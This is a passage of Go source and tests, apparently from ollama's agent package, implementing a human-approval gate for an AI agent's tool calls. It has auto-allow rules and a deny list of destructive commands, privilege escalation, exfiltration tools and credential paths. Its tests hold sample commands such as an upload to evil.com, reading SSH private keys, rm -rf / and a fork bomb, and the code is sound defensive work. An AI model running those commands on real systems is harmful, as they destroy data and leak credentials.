	if am.IsAllowed("tool1", nil) || am.IsAllowed("tool2", nil) {
		t.Error("expected tools to not be allowed after Reset")
	}
}

// TestApprovalManager_AllowedTools verifies AllowedTools reflects the number
// of entries added to the allowlist.
func TestApprovalManager_AllowedTools(t *testing.T) {
	am := NewApprovalManager()
	tools := am.AllowedTools()
	if len(tools) != 0 {
		t.Errorf("expected 0 allowed tools, got %d", len(tools))
	}
	am.AddToAllowlist("tool1", nil)
	am.AddToAllowlist("tool2", nil)
	tools = am.AllowedTools()
	if len(tools) != 2 {
		t.Errorf("expected 2 allowed tools, got %d", len(tools))
	}
}

// TestAllowlistKey verifies key derivation: bash commands embed the command
// string ("bash:<cmd>"); every other tool keys on its name alone.
func TestAllowlistKey(t *testing.T) {
	tests := []struct {
		name     string
		toolName string
		args     map[string]any
		expected string
	}{
		{
			name:     "web_search tool",
			toolName: "web_search",
			args:     map[string]any{"query": "test"},
			expected: "web_search",
		},
		{
			name:     "bash tool with command",
			toolName: "bash",
			args:     map[string]any{"command": "ls -la"},
			expected: "bash:ls -la",
		},
		{
			name:     "bash tool without command",
			toolName: "bash",
			args:     map[string]any{},
			expected: "bash",
		},
		{
			name:     "other tool",
			toolName: "custom_tool",
			args:     map[string]any{"param": "value"},
			expected: "custom_tool",
		},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			result := AllowlistKey(tt.toolName, tt.args)
			if result != tt.expected {
				t.Errorf("AllowlistKey(%s, %v) = %s, expected %s", tt.toolName, tt.args, result, tt.expected)
			}
		})
	}
}

// TestExtractBashPrefix verifies prefix derivation ("cmd:dir/") for safe
// read-style commands and that unsafe or pathless commands yield "".
func TestExtractBashPrefix(t *testing.T) {
	tests := []struct {
		name     string
		command  string
		expected string
	}{
		{
			name:     "cat with path",
			command:  "cat tools/tools_test.go",
			expected: "cat:tools/",
		},
		{
			name:     "cat with pipe",
			command:  "cat tools/tools_test.go | head -200",
			expected: "cat:tools/",
		},
		{
			name:     "ls with path",
			command:  "ls -la src/components",
			expected: "ls:src/",
		},
		{
			name:     "grep with directory path",
			command:  "grep -r pattern api/handlers/",
			expected: "grep:api/handlers/",
		},
		{
			name:     "cat in current dir",
			command:  "cat file.txt",
			expected: "cat:./",
		},
		{
			name:     "unsafe command",
			command:  "rm -rf /",
			expected: "",
		},
		{
			name:     "no path arg",
			command:  "ls -la",
			expected: "",
		},
		{
			name:     "head with flags only",
			command:  "head -n 100",
			expected: "",
		},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			result := extractBashPrefix(tt.command)
			if result != tt.expected {
				t.Errorf("extractBashPrefix(%q) = %q, expected %q", tt.command, result, tt.expected)
			}
		})
	}
}

// TestApprovalManager_PrefixAllowlist verifies that approving one bash command
// grants the same safe command on other files in the same directory, but not
// other directories or other (unsafe) commands.
func TestApprovalManager_PrefixAllowlist(t *testing.T) {
	am := NewApprovalManager()
	// Allow "cat tools/file.go"
	am.AddToAllowlist("bash", map[string]any{"command": "cat tools/file.go"})
	// Should allow other files in same directory
	if !am.IsAllowed("bash", map[string]any{"command": "cat tools/other.go"}) {
		t.Error("expected cat tools/other.go to be allowed via prefix")
	}
	// Should not allow different directory
	if am.IsAllowed("bash", map[string]any{"command": "cat src/main.go"}) {
		t.Error("expected cat src/main.go to NOT be allowed")
	}
	// Should not allow different command in same directory
	if am.IsAllowed("bash", map[string]any{"command": "rm tools/file.go"}) {
		t.Error("expected rm tools/file.go to NOT be allowed (rm is not a safe command)")
	}
}

// TestFormatApprovalResult smoke-tests the formatter: it only asserts the
// output is non-empty, since ANSI color codes preclude exact comparison.
// NOTE(review): the `contains` field is declared but never asserted against —
// presumably intentional for the same ANSI reason; verify or drop the field.
func TestFormatApprovalResult(t *testing.T) {
	tests := []struct {
		name     string
		toolName string
		args     map[string]any
		result   ApprovalResult
		contains string
	}{
		{
			name:     "approved bash",
			toolName: "bash",
			args:     map[string]any{"command": "ls"},
			result:   ApprovalResult{Decision: ApprovalOnce},
			contains: "bash: ls",
		},
		{
			name:     "denied web_search",
			toolName: "web_search",
			args:     map[string]any{"query": "test"},
			result:   ApprovalResult{Decision: ApprovalDeny},
			contains: "Denied",
		},
		{
			name:     "always allowed",
			toolName: "bash",
			args:     map[string]any{"command": "pwd"},
			result:   ApprovalResult{Decision: ApprovalAlways},
			contains: "Always allowed",
		},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			result := FormatApprovalResult(tt.toolName, tt.args, tt.result)
			if result == "" {
				t.Error("expected non-empty result")
			}
			// Just check it contains expected substring
			// (can't check exact string due to ANSI codes)
		})
	}
}

// TestFormatDenyResult verifies the denial message with and without a reason.
func TestFormatDenyResult(t *testing.T) {
	result := FormatDenyResult("bash", "")
	if result != "User denied execution of bash." {
		t.Errorf("unexpected result: %s", result)
	}
	result = FormatDenyResult("bash", "too dangerous")
	if result != "User denied execution of bash. Reason: too dangerous" {
		t.Errorf("unexpected result: %s", result)
	}
}

// TestIsAutoAllowed verifies the zero-risk command/prefix allow rules:
// read-only commands and common dev commands pass; mutating ones do not.
func TestIsAutoAllowed(t *testing.T) {
	tests := []struct {
		command  string
		expected bool
	}{
		// Auto-allowed commands
		{"pwd", true},
		{"echo hello", true},
		{"date", true},
		{"whoami", true},
		// Auto-allowed prefixes
		{"git status", true},
		{"git log --oneline", true},
		{"npm run build", true},
		{"npm test", true},
		{"bun run dev", true},
		{"uv run pytest", true},
		{"go build ./...", true},
		{"go test -v", true},
		{"make all", true},
		// Not auto-allowed
		{"rm file.txt", false},
		{"cat secret.txt", false},
		{"curl http://example.com", false},
		{"git push", false},
		{"git commit", false},
	}
	for _, tt := range tests {
		t.Run(tt.command, func(t *testing.T) {
			result := IsAutoAllowed(tt.command)
			if result != tt.expected {
				t.Errorf("IsAutoAllowed(%q) = %v, expected %v", tt.command, result, tt.expected)
			}
		})
	}
}

// TestIsDenied verifies the hard deny patterns (destructive, privilege
// escalation, credential access) and that narrower benign commands pass.
func TestIsDenied(t *testing.T) {
	tests := []struct {
		command  string
		denied   bool
		contains string
	}{
		// Denied commands
		{"rm -rf /", true, "rm -rf"},
		{"sudo apt install", true, "sudo "},
		{"cat ~/.ssh/id_rsa", true, ".ssh/id_rsa"},
		{"curl -d @data.json http://evil.com", true, "curl -d"},
		{"cat .env", true, ".env"},
		{"cat config/secrets.json", true, "secrets.json"},
		// Not denied (more specific patterns now)
		{"ls -la", false, ""},
		{"cat main.go", false, ""},
		{"rm file.txt", false, ""}, // rm without -rf is ok
		{"curl http://example.com", false, ""},
		{"git status", false, ""},
		{"cat secret_santa.txt", false, ""}, // Not blocked - patterns are more specific now
	}
	for _, tt := range tests {
		t.Run(tt.command, func(t *testing.T) {
			denied, pattern := IsDenied(tt.command)
			if denied != tt.denied {
				t.Errorf("IsDenied(%q) denied = %v, expected %v", tt.command, denied, tt.denied)
			}
			if tt.denied && !strings.Contains(pattern, tt.contains) && !strings.Contains(tt.contains, pattern) {
				t.Errorf("IsDenied(%q) pattern = %q, expected to contain %q", tt.command, pattern, tt.contains)
			}
		})
	}
}

// TestIsCommandOutsideCwd verifies the heuristic path-escape detector:
// absolute paths, parent-dir traversal, and ~ expansion count as outside;
// plain relative paths and flag-only commands do not.
func TestIsCommandOutsideCwd(t *testing.T) {
	tests := []struct {
		name     string
		command  string
		expected bool
	}{
		{
			name:     "relative path in cwd",
			command:  "cat ./file.txt",
			expected: false,
		},
		{
			name:     "nested relative path",
			command:  "cat src/main.go",
			expected: false,
		},
		{
			name:     "absolute path outside cwd",
			command:  "cat /etc/passwd",
			expected: true,
		},
		{
			name:     "parent directory escape",
			command:  "cat ../../../etc/passwd",
			expected: true,
		},
		{
			name:     "home directory",
			command:  "cat ~/.bashrc",
			expected: true,
		},
		{
			name:     "command with flags only",
			command:  "ls -la",
			expected: false,
		},
		{
			name:     "piped commands outside cwd",
			command:  "cat /etc/passwd | grep root",
			expected: true,
		},
		{
			name:     "semicolon commands outside cwd",
			command:  "echo test; cat /etc/passwd",
			expected: true,
		},
		{
			name:     "single parent dir escapes cwd",
			command:  "cat ../README.md",
			expected: true, // Parent directory is outside cwd
		},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			result := isCommandOutsideCwd(tt.command)
			if result != tt.expected {
				t.Errorf("isCommandOutsideCwd(%q) = %v, expected %v", tt.command, result, tt.expected)
			}
		})
	}
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/x/agent/approval_unix.go
x/agent/approval_unix.go
//go:build !windows package agent import ( "syscall" "time" ) // flushStdin drains any buffered input from stdin. // This prevents leftover input from previous operations from affecting the selector. func flushStdin(fd int) { if err := syscall.SetNonblock(fd, true); err != nil { return } defer syscall.SetNonblock(fd, false) time.Sleep(5 * time.Millisecond) buf := make([]byte, 256) for { n, err := syscall.Read(fd, buf) if n <= 0 || err != nil { break } } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/x/agent/approval.go
x/agent/approval.go
// Package agent provides agent loop orchestration and tool approval.
package agent

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
	"sync"

	"golang.org/x/term"
)

// ApprovalDecision represents the user's decision for a tool execution.
type ApprovalDecision int

const (
	// ApprovalDeny means the user denied execution.
	ApprovalDeny ApprovalDecision = iota
	// ApprovalOnce means execute this one time only.
	ApprovalOnce
	// ApprovalAlways means add to session allowlist.
	ApprovalAlways
)

// ApprovalResult contains the decision and optional deny reason.
type ApprovalResult struct {
	Decision   ApprovalDecision
	DenyReason string // free-text reason supplied when Decision is ApprovalDeny
}

// Option labels for the selector (numbered for quick selection).
// Index order must match the decision mapping in RequestApproval:
// 0 = once, 1 = always, 2 = deny.
var optionLabels = []string{
	"1. Execute once",
	"2. Always allow",
	"3. Deny",
}

// autoAllowCommands are commands that are always allowed without prompting.
// These are zero-risk, read-only commands.
var autoAllowCommands = map[string]bool{
	"pwd": true, "echo": true, "date": true, "whoami": true, "hostname": true, "uname": true,
}

// autoAllowPrefixes are command prefixes that are always allowed.
// These are read-only or commonly-needed development commands.
var autoAllowPrefixes = []string{
	// Git read-only
	"git status", "git log", "git diff", "git branch", "git show", "git remote -v", "git tag", "git stash list",
	// Package managers - run scripts
	"npm run", "npm test", "npm start", "bun run", "bun test", "uv run", "yarn run", "yarn test", "pnpm run", "pnpm test",
	// Package info
	"go list", "go version", "go env", "npm list", "npm ls", "npm version", "pip list", "pip show", "cargo tree", "cargo version",
	// Build commands
	"go build", "go test", "go fmt", "go vet", "make", "cmake", "cargo build", "cargo test", "cargo check",
}

// denyPatterns are dangerous command patterns that are always blocked.
// Matching is case-insensitive substring containment (see IsDenied), so a
// pattern anywhere in the command blocks it.
var denyPatterns = []string{
	// Destructive commands
	"rm -rf", "rm -fr", "mkfs", "dd if=", "dd of=", "shred", "> /dev/", ">/dev/",
	// Privilege escalation
	"sudo ", "su ", "doas ", "chmod 777", "chmod -R 777", "chown ", "chgrp ",
	// Network exfiltration
	"curl -d", "curl --data", "curl -X POST", "curl -X PUT", "wget --post", "nc ", "netcat ", "scp ", "rsync ",
	// History and credentials
	"history", ".bash_history", ".zsh_history", ".ssh/id_rsa", ".ssh/id_dsa", ".ssh/id_ecdsa", ".ssh/id_ed25519", ".ssh/config", ".aws/credentials", ".aws/config", ".gnupg/", "/etc/shadow", "/etc/passwd",
	// Dangerous patterns
	":(){ :|:& };:", // fork bomb
	"chmod +s",      // setuid
	"mkfifo",
}

// denyPathPatterns are file patterns that should never be accessed.
// These are checked as exact filename matches or path suffixes.
// NOTE(review): like denyPatterns they are matched by substring in IsDenied,
// so ".key" also blocks e.g. "my.keyring" — confirm that is intended.
var denyPathPatterns = []string{
	".env", ".env.local", ".env.production",
	"credentials.json", "secrets.json", "secrets.yaml", "secrets.yml",
	".pem", ".key",
}

// ApprovalManager manages tool execution approvals.
// It is safe for concurrent use; allowlist/prefixes are guarded by mu.
type ApprovalManager struct {
	allowlist map[string]bool // exact matches
	prefixes  map[string]bool // prefix matches for bash commands (e.g., "cat:tools/")
	mu        sync.RWMutex
}

// NewApprovalManager creates a new approval manager.
func NewApprovalManager() *ApprovalManager {
	return &ApprovalManager{
		allowlist: make(map[string]bool),
		prefixes:  make(map[string]bool),
	}
}

// IsAutoAllowed checks if a bash command is auto-allowed (no prompt needed).
func IsAutoAllowed(command string) bool {
	command = strings.TrimSpace(command)
	// Check exact command match (first word)
	fields := strings.Fields(command)
	if len(fields) > 0 && autoAllowCommands[fields[0]] {
		return true
	}
	// Check prefix match
	for _, prefix := range autoAllowPrefixes {
		if strings.HasPrefix(command, prefix) {
			return true
		}
	}
	return false
}

// IsDenied checks if a bash command matches deny patterns.
// Returns true and the matched pattern if denied.
// Matching is case-insensitive substring containment over the whole command.
func IsDenied(command string) (bool, string) {
	commandLower := strings.ToLower(command)
	// Check deny patterns
	for _, pattern := range denyPatterns {
		if strings.Contains(commandLower, strings.ToLower(pattern)) {
			return true, pattern
		}
	}
	// Check deny path patterns
	for _, pattern := range denyPathPatterns {
		if strings.Contains(commandLower, strings.ToLower(pattern)) {
			return true, pattern
		}
	}
	return false, ""
}

// FormatDeniedResult returns the tool result message when a command is blocked.
func FormatDeniedResult(command string, pattern string) string {
	return fmt.Sprintf("Command blocked: this command matches a dangerous pattern (%s) and cannot be executed. If this command is necessary, please ask the user to run it manually.", pattern)
}

// extractBashPrefix extracts a prefix pattern from a bash command.
// For commands like "cat tools/tools_test.go | head -200", returns "cat:tools/"
// For commands without path args, returns empty string.
func extractBashPrefix(command string) string {
	// Split command by pipes and get the first part
	parts := strings.Split(command, "|")
	firstCmd := strings.TrimSpace(parts[0])
	// Split into command and args
	fields := strings.Fields(firstCmd)
	if len(fields) < 2 {
		return ""
	}
	baseCmd := fields[0]
	// Common commands that benefit from prefix allowlisting
	// These are typically safe for read operations on specific directories
	safeCommands := map[string]bool{
		"cat": true, "ls": true, "head": true, "tail": true, "less": true, "more": true,
		"file": true, "wc": true, "grep": true, "find": true, "tree": true, "stat": true, "sed": true,
	}
	if !safeCommands[baseCmd] {
		return ""
	}
	// Find the first path-like argument (must contain / or start with .)
	// First pass: look for clear paths (containing / or starting with .)
	for _, arg := range fields[1:] {
		// Skip flags
		if strings.HasPrefix(arg, "-") {
			continue
		}
		// Skip numeric arguments (e.g., "head -n 100")
		if isNumeric(arg) {
			continue
		}
		// Only process if it looks like a path (contains / or starts with .)
		if !strings.Contains(arg, "/") && !strings.HasPrefix(arg, ".") {
			continue
		}
		// If arg ends with /, it's a directory - use it directly
		if strings.HasSuffix(arg, "/") {
			return fmt.Sprintf("%s:%s", baseCmd, arg)
		}
		// Get the directory part of a file path
		dir := filepath.Dir(arg)
		if dir == "." {
			// Path is just a directory like "tools" or "src" (no trailing /)
			return fmt.Sprintf("%s:%s/", baseCmd, arg)
		}
		return fmt.Sprintf("%s:%s/", baseCmd, dir)
	}
	// Second pass: if no clear path found, use the first non-flag argument as a filename
	for _, arg := range fields[1:] {
		if strings.HasPrefix(arg, "-") {
			continue
		}
		if isNumeric(arg) {
			continue
		}
		// Treat as filename in current dir
		return fmt.Sprintf("%s:./", baseCmd)
	}
	return ""
}

// isNumeric checks if a string is a numeric value (ASCII digits only).
func isNumeric(s string) bool {
	for _, c := range s {
		if c < '0' || c > '9' {
			return false
		}
	}
	return len(s) > 0
}

// isCommandOutsideCwd checks if a bash command targets paths outside the current working directory.
// Returns true if any path argument would access files outside cwd.
// NOTE(review): the strings.HasPrefix(absPath, cwd) checks are byte-prefix
// comparisons, so a sibling dir like "/work2" passes for cwd "/work" —
// consider filepath.Rel or a separator-terminated prefix; verify intent.
func isCommandOutsideCwd(command string) bool {
	cwd, err := os.Getwd()
	if err != nil {
		return false // Can't determine, assume safe
	}
	// Split command by pipes and semicolons to check all parts
	parts := strings.FieldsFunc(command, func(r rune) bool {
		return r == '|' || r == ';' || r == '&'
	})
	for _, part := range parts {
		part = strings.TrimSpace(part)
		fields := strings.Fields(part)
		if len(fields) == 0 {
			continue
		}
		// Check each argument that looks like a path
		for _, arg := range fields[1:] {
			// Skip flags
			if strings.HasPrefix(arg, "-") {
				continue
			}
			// Treat POSIX-style absolute paths as outside cwd on all platforms.
			if strings.HasPrefix(arg, "/") || strings.HasPrefix(arg, "\\") {
				return true
			}
			// Check for absolute paths outside cwd
			if filepath.IsAbs(arg) {
				absPath := filepath.Clean(arg)
				if !strings.HasPrefix(absPath, cwd) {
					return true
				}
				continue
			}
			// Check for relative paths that escape cwd (e.g., ../foo, /etc/passwd)
			if strings.HasPrefix(arg, "..") {
				// Resolve the path relative to cwd
				absPath := filepath.Join(cwd, arg)
				absPath = filepath.Clean(absPath)
				if !strings.HasPrefix(absPath, cwd) {
					return true
				}
			}
			// Check for home directory expansion
			if strings.HasPrefix(arg, "~") {
				home, err := os.UserHomeDir()
				if err == nil && !strings.HasPrefix(home, cwd) {
					return true
				}
			}
		}
	}
	return false
}

// AllowlistKey generates the key for exact allowlist lookup.
// Bash commands key on "bash:<command>"; all other tools key on their name.
func AllowlistKey(toolName string, args map[string]any) string {
	if toolName == "bash" {
		if cmd, ok := args["command"].(string); ok {
			return fmt.Sprintf("bash:%s", cmd)
		}
	}
	return toolName
}

// IsAllowed checks if a tool/command is allowed (exact match or prefix match).
func (a *ApprovalManager) IsAllowed(toolName string, args map[string]any) bool {
	a.mu.RLock()
	defer a.mu.RUnlock()
	// Check exact match first
	key := AllowlistKey(toolName, args)
	if a.allowlist[key] {
		return true
	}
	// For bash commands, check prefix matches
	if toolName == "bash" {
		if cmd, ok := args["command"].(string); ok {
			prefix := extractBashPrefix(cmd)
			if prefix != "" && a.prefixes[prefix] {
				return true
			}
		}
	}
	// Check if tool itself is allowed (non-bash)
	if toolName != "bash" && a.allowlist[toolName] {
		return true
	}
	return false
}

// AddToAllowlist adds a tool/command to the session allowlist.
// For bash commands, it adds the prefix pattern instead of exact command.
func (a *ApprovalManager) AddToAllowlist(toolName string, args map[string]any) {
	a.mu.Lock()
	defer a.mu.Unlock()
	if toolName == "bash" {
		if cmd, ok := args["command"].(string); ok {
			prefix := extractBashPrefix(cmd)
			if prefix != "" {
				a.prefixes[prefix] = true
				return
			}
			// Fall back to exact match if no prefix extracted
			a.allowlist[fmt.Sprintf("bash:%s", cmd)] = true
			return
		}
	}
	a.allowlist[toolName] = true
}

// RequestApproval prompts the user for approval to execute a tool.
// Returns the decision and optional deny reason.
// Puts the terminal into raw mode for the interactive selector and always
// restores it before returning; falls back to line input if raw mode fails.
func (a *ApprovalManager) RequestApproval(toolName string, args map[string]any) (ApprovalResult, error) {
	// Format tool info for display
	toolDisplay := formatToolDisplay(toolName, args)
	// Enter raw mode for interactive selection
	fd := int(os.Stdin.Fd())
	oldState, err := term.MakeRaw(fd)
	if err != nil {
		// Fallback to simple input if terminal control fails
		return a.fallbackApproval(toolDisplay)
	}
	// Flush any pending stdin input before starting selector
	// This prevents buffered input from causing double-press issues
	flushStdin(fd)
	// Check if bash command targets paths outside cwd
	isWarning := false
	if toolName == "bash" {
		if cmd, ok := args["command"].(string); ok {
			isWarning = isCommandOutsideCwd(cmd)
		}
	}
	// Run interactive selector
	selected, denyReason, err := runSelector(fd, oldState, toolDisplay, isWarning)
	if err != nil {
		term.Restore(fd, oldState)
		return ApprovalResult{Decision: ApprovalDeny}, err
	}
	// Restore terminal
	term.Restore(fd, oldState)
	// Map selection to decision
	switch selected {
	case -1: // Ctrl+C cancelled
		return ApprovalResult{Decision: ApprovalDeny, DenyReason: "cancelled"}, nil
	case 0:
		return ApprovalResult{Decision: ApprovalOnce}, nil
	case 1:
		return ApprovalResult{Decision: ApprovalAlways}, nil
	default:
		return ApprovalResult{Decision: ApprovalDeny, DenyReason: denyReason}, nil
	}
}

// formatToolDisplay creates the display string for a tool call.
// bash and web_search get dedicated layouts; other tools get a generic
// "Tool: name" line with a flat key=value argument listing.
func formatToolDisplay(toolName string, args map[string]any) string {
	var sb strings.Builder
	// For bash, show command directly
	if toolName == "bash" {
		if cmd, ok := args["command"].(string); ok {
			sb.WriteString(fmt.Sprintf("Tool: %s\n", toolName))
			sb.WriteString(fmt.Sprintf("Command: %s", cmd))
			return sb.String()
		}
	}
	// For web search, show query
	if toolName == "web_search" {
		if query, ok := args["query"].(string); ok {
			sb.WriteString(fmt.Sprintf("Tool: %s\n", toolName))
			sb.WriteString(fmt.Sprintf("Query: %s", query))
			return sb.String()
		}
	}
	// Generic display
	sb.WriteString(fmt.Sprintf("Tool: %s", toolName))
	if len(args) > 0 {
		sb.WriteString("\nArguments: ")
		first := true
		// NOTE(review): map iteration order is random, so the argument
		// listing is non-deterministic across calls — confirm acceptable.
		for k, v := range args {
			if !first {
				sb.WriteString(", ")
			}
			sb.WriteString(fmt.Sprintf("%s=%v", k, v))
			first = false
		}
	}
	return sb.String()
}

// selectorState holds the state for the interactive selector
type selectorState struct {
	toolDisplay string
	selected    int
	totalLines  int
	termWidth   int
	termHeight  int
	boxWidth    int
	innerWidth  int
	denyReason  string // deny reason (always visible in box)
	isWarning   bool   // true if command targets paths outside cwd (red box)
}

// runSelector runs the interactive selector and returns the selected index and optional deny reason.
// If isWarning is true, the box is rendered in red to indicate the command targets paths outside cwd.
// Returns -1 for Ctrl+C cancellation; otherwise 0..2 matching optionLabels.
func runSelector(fd int, oldState *term.State, toolDisplay string, isWarning bool) (int, string, error) {
	state := &selectorState{
		toolDisplay: toolDisplay,
		selected:    0,
		isWarning:   isWarning,
	}
	// Get terminal size
	state.termWidth, state.termHeight, _ = term.GetSize(fd)
	if state.termWidth < 20 {
		state.termWidth = 80 // fallback
	}
	// Calculate box width: 90% of terminal, min 24, max 60
	state.boxWidth = (state.termWidth * 90) / 100
	if state.boxWidth > 60 {
		state.boxWidth = 60
	}
	if state.boxWidth < 24 {
		state.boxWidth = 24
	}
	// Ensure box fits in terminal
	if state.boxWidth > state.termWidth-1 {
		state.boxWidth = state.termWidth - 1
	}
	state.innerWidth = state.boxWidth - 4 // account for "│ " and " │"
	// Calculate total lines (will be updated by render)
	state.totalLines = calculateTotalLines(state)
	// Hide cursor during selection (show when in deny mode)
	fmt.Fprint(os.Stderr, "\033[?25l")
	defer fmt.Fprint(os.Stderr, "\033[?25h") // Show cursor when done
	// Initial render
	renderSelectorBox(state)
	numOptions := len(optionLabels)
	for {
		// Read input
		buf := make([]byte, 8)
		n, err := os.Stdin.Read(buf)
		if err != nil {
			clearSelectorBox(state)
			return 2, "", err
		}
		// Process input byte by byte
		for i := 0; i < n; i++ {
			ch := buf[i]
			// Check for escape sequences (arrow keys)
			if ch == 27 && i+2 < n && buf[i+1] == '[' {
				oldSelected := state.selected
				switch buf[i+2] {
				case 'A': // Up arrow
					if state.selected > 0 {
						state.selected--
					}
				case 'B': // Down arrow
					if state.selected < numOptions-1 {
						state.selected++
					}
				}
				if oldSelected != state.selected {
					updateSelectorOptions(state)
				}
				i += 2 // Skip the rest of escape sequence
				continue
			}
			switch {
			// Ctrl+C - cancel
			case ch == 3:
				clearSelectorBox(state)
				return -1, "", nil // -1 indicates cancelled
			// Enter key - confirm selection
			case ch == 13:
				clearSelectorBox(state)
				if state.selected == 2 { // Deny
					return 2, state.denyReason, nil
				}
				return state.selected, "", nil
			// Number keys 1-3 for quick select
			case ch >= '1' && ch <= '3':
				selected := int(ch - '1')
				clearSelectorBox(state)
				if selected == 2 { // Deny
					return 2, state.denyReason, nil
				}
				return selected, "", nil
			// Backspace - delete from reason (UTF-8 safe)
			case ch == 127 || ch == 8:
				if len(state.denyReason) > 0 {
					runes := []rune(state.denyReason)
					state.denyReason = string(runes[:len(runes)-1])
					updateReasonInput(state)
				}
			// Escape - clear reason
			case ch == 27:
				if len(state.denyReason) > 0 {
					state.denyReason = ""
					updateReasonInput(state)
				}
			// Printable ASCII (except 1-3 handled above) - type into reason
			case ch >= 32 && ch < 127:
				maxLen := state.innerWidth - 2
				if maxLen < 10 {
					maxLen = 10
				}
				if len(state.denyReason) < maxLen {
					state.denyReason += string(ch)
					// Auto-select Deny option when user starts typing
					if state.selected != 2 {
						state.selected = 2
						updateSelectorOptions(state)
					} else {
						updateReasonInput(state)
					}
				}
			}
		}
	}
}

// wrapText wraps text to fit within maxWidth, returning lines.
// NOTE(review): wrapping is byte-indexed, so multi-byte UTF-8 text (e.g. the
// box-drawing hint glyphs) may split mid-rune — confirm inputs are ASCII.
func wrapText(text string, maxWidth int) []string {
	if maxWidth < 5 {
		maxWidth = 5
	}
	var lines []string
	for _, line := range strings.Split(text, "\n") {
		if len(line) <= maxWidth {
			lines = append(lines, line)
			continue
		}
		// Wrap long lines
		for len(line) > maxWidth {
			// Try to break at space
			breakAt := maxWidth
			for i := maxWidth; i > maxWidth/2; i-- {
				if i < len(line) && line[i] == ' ' {
					breakAt = i
					break
				}
			}
			lines = append(lines, line[:breakAt])
			line = strings.TrimLeft(line[breakAt:], " ")
		}
		if len(line) > 0 {
			lines = append(lines, line)
		}
	}
	return lines
}

// getHintLines returns the hint text wrapped to terminal width
func getHintLines(state *selectorState) []string {
	hint := "↑/↓ navigate, Enter confirm, 1-3 quick, Ctrl+C cancel"
	if state.termWidth >= len(hint)+1 {
		return []string{hint}
	}
	// Wrap hint to multiple lines
	return wrapText(hint, state.termWidth-1)
}

// calculateTotalLines calculates how many lines the selector will use
func calculateTotalLines(state *selectorState) int {
	toolLines := wrapText(state.toolDisplay, state.innerWidth)
	hintLines := getHintLines(state)
	// top border + (warning line if applicable) + tool lines + separator + options + bottom border + hint lines
	warningLines := 0
	if state.isWarning {
		warningLines = 1
	}
	return 1 + warningLines + len(toolLines) + 1 + len(optionLabels) + 1 + len(hintLines)
}

// renderSelectorBox renders the complete selector box.
// NOTE(review): the unselected-row format strings pad to innerWidth-2 without
// the 2-char "> " marker the selected row has — check right-border alignment
// against upstream; the spacing here reproduces SOURCE exactly.
func renderSelectorBox(state *selectorState) {
	toolLines := wrapText(state.toolDisplay, state.innerWidth)
	hintLines := getHintLines(state)
	// Use red for warning (outside cwd), cyan for normal
	boxColor := "\033[36m" // cyan
	if state.isWarning {
		boxColor = "\033[91m" // bright red
	}
	// Draw box top
	fmt.Fprintf(os.Stderr, "%s┌%s┐\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
	// Draw warning line if needed (inside the box)
	if state.isWarning {
		warning := "!! OUTSIDE PROJECT !!"
		padding := (state.innerWidth - len(warning)) / 2
		if padding < 0 {
			padding = 0
		}
		fmt.Fprintf(os.Stderr, "%s│\033[0m %s%s%s %s│\033[0m\033[K\r\n", boxColor, strings.Repeat(" ", padding), warning, strings.Repeat(" ", state.innerWidth-len(warning)-padding), boxColor)
	}
	// Draw tool info
	for _, line := range toolLines {
		fmt.Fprintf(os.Stderr, "%s│\033[0m %-*s %s│\033[0m\033[K\r\n", boxColor, state.innerWidth, line, boxColor)
	}
	// Draw separator
	fmt.Fprintf(os.Stderr, "%s├%s┤\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
	// Draw options with numbers (Deny option includes reason input)
	for i, label := range optionLabels {
		if i == 2 {
			// Deny option - show with reason input beside it
			denyLabel := "3. Deny: "
			availableWidth := state.innerWidth - 2 - len(denyLabel)
			if availableWidth < 5 {
				availableWidth = 5
			}
			inputDisplay := state.denyReason
			if len(inputDisplay) > availableWidth {
				inputDisplay = inputDisplay[len(inputDisplay)-availableWidth:]
			}
			if i == state.selected {
				fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
			} else {
				fmt.Fprintf(os.Stderr, "%s│\033[0m \033[90m%s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
			}
		} else {
			displayLabel := label
			if len(displayLabel) > state.innerWidth-2 {
				displayLabel = displayLabel[:state.innerWidth-5] + "..."
			}
			if i == state.selected {
				fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %-*s\033[0m %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor)
			} else {
				fmt.Fprintf(os.Stderr, "%s│\033[0m %-*s %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor)
			}
		}
	}
	// Draw box bottom
	fmt.Fprintf(os.Stderr, "%s└%s┘\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
	// Draw hint (may be multiple lines)
	for i, line := range hintLines {
		if i == len(hintLines)-1 {
			// Last line - no newline
			fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K", line)
		} else {
			fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K\r\n", line)
		}
	}
}

// updateSelectorOptions updates just the options portion of the selector
func updateSelectorOptions(state *selectorState) {
	hintLines := getHintLines(state)
	// Use red for warning (outside cwd), cyan for normal
	boxColor := "\033[36m" // cyan
	if state.isWarning {
		boxColor = "\033[91m" // bright red
	}
	// Move up to the first option line
	// Cursor is at end of last hint line, need to go up:
	// (hint lines - 1) + 1 (bottom border) + numOptions
	linesToMove := len(hintLines) - 1 + 1 + len(optionLabels)
	fmt.Fprintf(os.Stderr, "\033[%dA\r", linesToMove)
	// Redraw options (Deny option includes reason input)
	for i, label := range optionLabels {
		if i == 2 {
			// Deny option
			denyLabel := "3. Deny: "
			availableWidth := state.innerWidth - 2 - len(denyLabel)
